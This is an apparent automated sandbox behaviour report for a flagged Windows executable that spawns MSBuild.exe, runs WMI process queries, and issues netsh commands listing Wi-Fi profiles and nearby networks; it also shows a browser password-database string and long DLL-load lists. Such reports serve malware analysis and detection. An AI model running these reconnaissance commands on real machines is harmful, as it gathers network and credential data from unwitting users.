Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File read: C:\Users\user\Pictures\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpD1F1.tmp.dat.6.dr, tmpD18E.tmp.dat.6.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Kh7W85ONS7.exe	Virustotal: Detection: 45%
Source: Kh7W85ONS7.exe	ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\Kh7W85ONS7.exe "C:\Users\user\Desktop\Kh7W85ONS7.exe"
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
